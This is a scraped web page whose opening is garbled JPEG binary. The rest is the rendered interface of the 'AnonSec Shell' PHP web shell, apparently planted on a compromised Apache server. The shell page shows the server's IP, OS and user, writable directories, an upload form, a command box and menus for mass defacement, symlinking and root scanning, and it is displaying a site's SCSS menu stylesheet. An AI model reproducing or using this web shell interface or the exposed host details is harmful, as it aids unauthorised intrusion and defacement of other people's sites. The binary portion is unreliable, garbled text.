JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/www/assets/sass/front/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/www/assets/sass/front/partials/_menu.scss
/* --------------------------------------------------------------
-- Menu
-------------------------------------------------------------- */

.services_submenu {
    list-style: disc outside;

    li {
        margin-left: 33px;
    }
}

.menu-list {
    margin-bottom: rem(18);

    > li > a,
    > li > .menu-list__item-wrap > a {
        position: relative;
        border-bottom: rem(1) solid $primary-light;
        font-size: 18px;
    }

    > li:last-child a {
        border-bottom: 0;
    }
}

.new__top-menu-left {
    display: flex;
    list-style: none;
    height: 100%;
    align-items: center;
    padding-right: rem(10);

    li {
        margin: 0 rem(30) 0 0;
        padding: 0;
        font-weight: $weight-bold;

        &:last-child {
            margin-right: 0;
        }

        /* stylelint-disable */
        a {
            color: $white;
            font-size: 18px;

            @include mobile {
                font-size: 12px;
                line-height: rem(16);
                display: flex;
                align-items: center;
            }

            @media (max-width: 450px) {
                font-size: 10px;
                line-height: rem(14);
            }
        }
        /* stylelint-enable */

        @include until-widescreen {
            margin: 0 rem(16) 0 0;
        }

        @media (max-width: 380px) {
            margin: 0 rem(10) 0 0;
        }
    }
}

.menu-list__submenu {
    max-height: 0;
    overflow: hidden;
    transition: max-height 0.6s cubic-bezier(0.32, 0, 0.67, 0);
    transition-property: max-height, margin;
    margin-bottom: 0 !important;
    margin-top: 0 !important;

    &.is-expanded {
        max-height: rem(2000);
        margin-bottom: rem(10) !important;
        margin-top: rem(10) !important;
    }

    /* stylelint-disable */
    a {
        /* stylelint-enable */
        font-size: 16px;
        padding: rem(6) 1.33333rem rem(6) 1.4rem;

        &.has-icon {
            padding-left: rem(41);
        }

        /* stylelint-disable */
        &:hover,
        &:focus,
        .is-active {
            /* stylelint-enable */
            background-color: $white;
            color: $primary;
        }

        &.new-products {
            color: #2ba4e0;
        }

        &.instock-products {
            color: #4e992b;
        }
    }

    .menu-list__submenu {

        /* stylelint-disable */
        a {
            /* stylelint-enable */
            font-size: 14px;
            padding: rem(2) 1.33333rem rem(2) 1.4rem;
            color: $gray3;

            &:hover,
            &:focus,
            .is-active {
                color: $primary;
            }
        }
    }

    &.menu-list__child_more > {

        li:not(.child_show_more):nth-of-type(1n+9) {
            display: none;
        }
    }
}

.menu-list a.is-active {

    &:hover {
        background-color: $primary-mid-light;
    }
}

.menu-list__item-wrap {
    position: relative;
}

.menu-list__item-wrap2 {

    + .menu-list__item-wrap-chooser {
        display: none;
        width: 100%;
        border-bottom: rem(1) solid $primary-light;
        padding: rem(10) rem(14) rem(6) rem(14);
        flex-wrap: wrap;

        label {
            font-weight: normal;
            cursor: pointer;
            position: relative;
            padding-left: rem(23);
            padding-right: rem(43);

            &:last-child {
                padding-right: 0;
            }

            .checkmark {
                position: absolute;
                top: rem(2);
                left: 0;
                height: 13px;
                width: 13px;
                border: 1px solid $black;
                display: flex;
                align-items: center;
                justify-content: center;
                border-radius: 50%;
            }

            &.is-checked {
                color: $primary;
            }
        }

        input {
            position: absolute;
            opacity: 0;
            cursor: pointer;
            height: 0;
            width: 0;

            &:checked {

                ~ .checkmark .checkmark-in {
                    width: rem(9);
                    height: rem(9);
                    display: block;
                    background: $primary;
                    border-radius: 50%;
                }
            }
        }
    }

    &::after {
        content: '';
        position: absolute;
        background: url('/images/front/system/static/menu-dropdown.svg') no-repeat right rem(2) center;
        width: rem(30);
        height: 100%;
        top: 0;
        right: 0;
        cursor: pointer;
    }

    &.is-expanded {

        + .menu-list__item-wrap-chooser {
            display: flex;
        }

        &::after {
            transform: rotate(180deg);
            background-position: left rem(2) center;
        }
    }
}

.menu-expand {
    border: 0;
    background-color: transparent;
    background-image: url(/images/front/system/static/menu-dropdown.svg);
    background-repeat: no-repeat;
    background-position: right rem(2) center;
    position: absolute;
    right: 0;
    top: 0;
    height: 100%;
    width: rem(30);
    z-index: 1;
    cursor: pointer;

    &.is-expanded {
        transform: rotate(180deg);
        background-position: left rem(2) center;
    }

    &.is-small {
        background-size: 8px 5px;
    }
}

.menu-list__notification {
    display: inline-block;
    font-weight: $weight-bold;
    font-size: 10px;
    color: $white;
    background-color: $green;
    width: rem(19);
    height: rem(19);
    text-align: center;
    line-height: rem(19);
    border-radius: 50%;
    margin-bottom: rem(-2);
    position: relative;
    top: rem(-7);
    margin-left: rem(2);
}

.menu-list__icon {
    position: absolute;
    left: rem(16);
    top: rem(6);
    display: flex;
    width: rem(20);
    height: rem(20);
    text-align: center;
    justify-content: center;
}

.new__top-menu {
    background: $primary;
    position: relative;

    .main-tab-menu {
        display: flex;
        width: 100%;
        justify-content: space-between;
        align-items: center;
        margin-bottom: 0;
        height: rem($stripe-height);

        @include until-widescreen {
            padding-left: rem(20);
        }

        @include mobile {
            padding-left: rem(14);
            height: rem($stripe-height-mobile);
        }
    }
}

.new__main-tab-menu-tab-item {
    color: $white;
    cursor: pointer;
    font-size: 18px;

    &:hover {
        text-decoration: underline;
    }

    @include mobile {
        font-size: 12px;
        line-height: 16px;
        display: flex;
        align-items: center;
    }

    @media (max-width: 450px) {
        font-size: 10px;
        line-height: rem(14);
    }
}

.new__main-tab-menu-content {
    width: 100%;
    background: $white;

    .is-logged & {
        max-height: calc(100vh - #{rem(132 + $stripe-height)});
        overflow: auto;

        @media only screen and (min-width: 1320px) and (max-width: 1600px) {
            max-height: calc(100vh - #{rem(113 + $stripe-height)});
        }

        @media only screen and (min-width: 1185px) and (max-width: 1319px) {
            max-height: calc(100vh - #{rem(110 + $stripe-height)});
        }

        @include widescreen-only {
            max-height: calc(100vh - #{rem(99 + $stripe-height)});
        }

        @include desktop-only {
            max-height: calc(100vh - #{rem(95 + $stripe-height)});
        }

        @include tablet-only {
            max-height: calc(100vh - #{rem(95 + $stripe-height)});
        }

        @include mobile {
            max-height: calc(100vh - #{rem(59 + $stripe-height-mobile)});
        }
    }
}

.menu-filter__tabs {
    background: #f9f9f9;
    display: flex;
    flex-wrap: wrap;

    /* stylelint-disable */
    > li {
        border-right: rem(1) solid #e1e1e1;
        float: initial;
        flex-shrink: 0;

        &:last-child {
            border-right: 0;
        }

        > a {
            font-weight: $weight-normal;
            background-color: transparent;
            color: $text;
            border-style: none;

            &:hover,
            &:focus {
                border-style: none;
                background: #e9e9e9;
            }
        }

        &.active {

            > a {
                border-style: none;
                color: $white;
                background: rgb(22,82,112);
                background: linear-gradient(180deg, rgba(22,82,112,1) 0%, rgba(43,164,224,1) 100%);

                &:hover,
                &:focus {
                    border-style: none;
                }
            }
        }
    }
    /* stylelint-enable */
}

.new__top-menu-search {
    border: rem(2) solid $primary;
    background-color: $white;
    display: flex;
    max-height: 100%;

    .glass-submit {
        min-height: rem(52);
        background-color: $white;
        border: 0;
        padding-left: rem(16);
        padding-right: rem(16);
    }

    @include until-widescreen {
        position: absolute;
        top: 100%;
        right: 0;
        max-height: 0;
        border-width: 0 rem(2);
        overflow: hidden;
        transition: max-height 300ms cubic-bezier(0.215, 0.61, 0.355, 1);
        transition-property: max-height, border;

        form {
            display: flex;
            width: 100%;
        }

        &.is-active {
            max-height: rem(56);
            border-width: rem(2);
        }
    }

    @include mobile {
        width: 100%;
    }
}

.new__top-menu-search-input {
    min-height: rem(51);
    height: rem(51);
    padding-left: rem(20);
    padding-right: rem(10);
    padding-top: rem(15);
    padding-bottom: rem(15);
    border: 0;
    background-color: $white;
    min-width: rem(424);

    &:focus-visible {
        border: 0;
        outline: none;
    }

    @include mobile {
        width: calc(100% - #{rem(54)});
        min-width: 0;
    }
}

.new__top-menu-mobile {
    display: none;
    height: 100%;
    margin-right: rem(-20);

    @include until-widescreen {
        display: block;
    }

    @include mobile {
        margin-right: rem(-35);
    }
}

.new__top-menu-mobile-list {
    display: flex;
    height: 100%;
}

.new__top-menu-mobile-button {
    background-color: transparent;
    border: 0 solid transparent;
    width: rem(61);
    overflow: hidden;
    text-indent: 99999px;
    background-position: center;
    background-repeat: no-repeat;
    height: 100%;
    white-space: nowrap;
    display: block;

    &:hover,
    &:focus {
        background-color: darken($primary, 5%);
    }

    &.is-active {
        background-color: darken($primary, 10%);
    }

    @include mobile {
        width: rem(41);
        background-size: rem(22) rem(22);
    }

    @media (max-width: 450px) {
        width: rem(32);
        background-size: rem(17) rem(17);
    }
}

.new__top-menu-mobile-button--inquiry {
    background-image: url(/images/front/system/static/ico-menu-inquiry.svg);
}

.new__top-menu-mobile-button--search {
    background-image: url(/images/front/system/static/ico-menu-search.svg);
}

.new__top-menu-mobile-button--user {
    background-image: url(/images/front/system/static/ico-menu-user.svg);
    background-color: $secondary;
    width: rem(75);

    &:hover,
    &:focus {
        background-color: darken($secondary, 5%);
    }

    &.is-active {
        background-color: darken($secondary, 10%);
    }

    @include mobile {
        width: rem(41);
    }

    @media (max-width: 450px) {
        width: rem(32);
    }
}

.new__top-menu-user {
    position: absolute;
    right: 0;
    top: 100%;
    width: 100%;
    overflow: hidden;
    transition: max-height 300ms cubic-bezier(0.215, 0.61, 0.355, 1);
    transition-property: max-height, border, padding;
    display: none;
    max-height: 0;
    border-color: $primary;
    border-width: 0 rem(2);
    border-style: solid;
    background-color: $white;
    padding: 0 rem(25);

    &.is-active {
        max-height: calc(100vh - #{rem(96)});
        border-width: rem(2);
        padding-top: rem(20);
        padding-bottom: rem(20);
        overflow-y: auto;
    }

    @include until-widescreen {
        display: block;
    }

    @media only screen and (max-width: 500px) {
        padding: 0 rem(15);
    }
}

.new__top-menu-user-title {
    text-align: center;
    margin-top: 0;
    font-size: 12px;
    font-weight: 700;
    margin-bottom: rem(25);
}

.new__top-menu-user-menu {
    margin-bottom: rem(20);

    /* stylelint-disable */
    li {

        a {
            display: block;
            font-size: 12px;
            color: $black;
            padding: rem(10) rem(13);
            border-bottom: rem(1) solid $secondary;
        }
    }
    /* stylelint-enable */
}

.new__top-menu-user-overlay {
    display: none;
    position: absolute;
    left: 0;
    top: 100%;
    width: 100%;
    height: 0;
    transition: height 300ms cubic-bezier(0.215, 0.61, 0.355, 1);
    background-color: #1a6d95;
    opacity: 0.7;

    &.is-active {
        height: 100vh;
    }

    @include until-widescreen {
        display: block;
    }
}

.child_show_more-link {
    display: inline-block !important;
    width: initial;
    color: $primary !important;
    padding-right: 22px !important;
    background: url("/images/front/system/static/menu-dropdown.svg") no-repeat right 2px center;
}

.new__top-menu-special-item {
    background: #4e992b;
    line-height: 56px;
    height: 56px;
    display: inline-block;
    padding: 0 15px;

    @include mobile {
        line-height: 38px;
        height: 38px;
        padding: 0 12px;
        white-space: nowrap;
    }
}

Anon7 - 2022
AnonSec Team